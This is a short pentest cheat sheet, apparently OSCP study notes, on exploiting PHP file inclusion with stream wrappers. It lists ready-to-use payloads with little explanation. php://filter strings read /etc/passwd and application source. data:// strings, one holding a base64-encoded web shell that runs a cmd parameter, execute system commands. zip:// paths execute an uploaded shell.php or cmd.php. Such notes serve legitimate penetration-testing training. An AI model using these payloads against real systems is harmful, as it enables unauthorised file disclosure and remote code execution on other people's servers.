// notes/ Web Exploitation
🕸️
LFI And RFI Php Wrappers
Notes from oscp.adot8.com — web applications.
#web applications#adot8
source · oscp.adot8.com · web-applications/lfi-and-rfi_php-wrappers ↗PHP Wrappers
code
01php://filter/resource=/etc/passwd02php://filter/resource=index.php03php://filter/convert.base64-encode/resource=index.php04php://filter/convert.base64-encode/resource=index05php://filter/read=string.rot13/resource=index.php{% hint style="warning" %} Its important to try with and without the extension {% endhint %}
code
01data://text/plain,<?php echo system('whoami');?>"code
01echo -n '<?php echo system($_GET["cmd"]);?>' | base6402data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=whoami{% embed url="https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/?source=post_page-----b49a52ed8e38--------------------------------" %}
{% embed url="https://offsecpg.adot8.com/proving-grounds/proving-grounds-practice/linux/zipper/foothold" %}
{% hint style="info" %} If you have the ability to upload zip files, the zip:// will unzip and read/execute the file in the zip file {% endhint %}
code
01zip:///var/www/html/uploads/shell.zip%23shell.php02zip:///var/www/html/uploads/upload_1725881785.zip%23cmd.php&cmd=id03zip:///var/www/html/uploads/upload_1725881785.zip%23cmd&cmd=id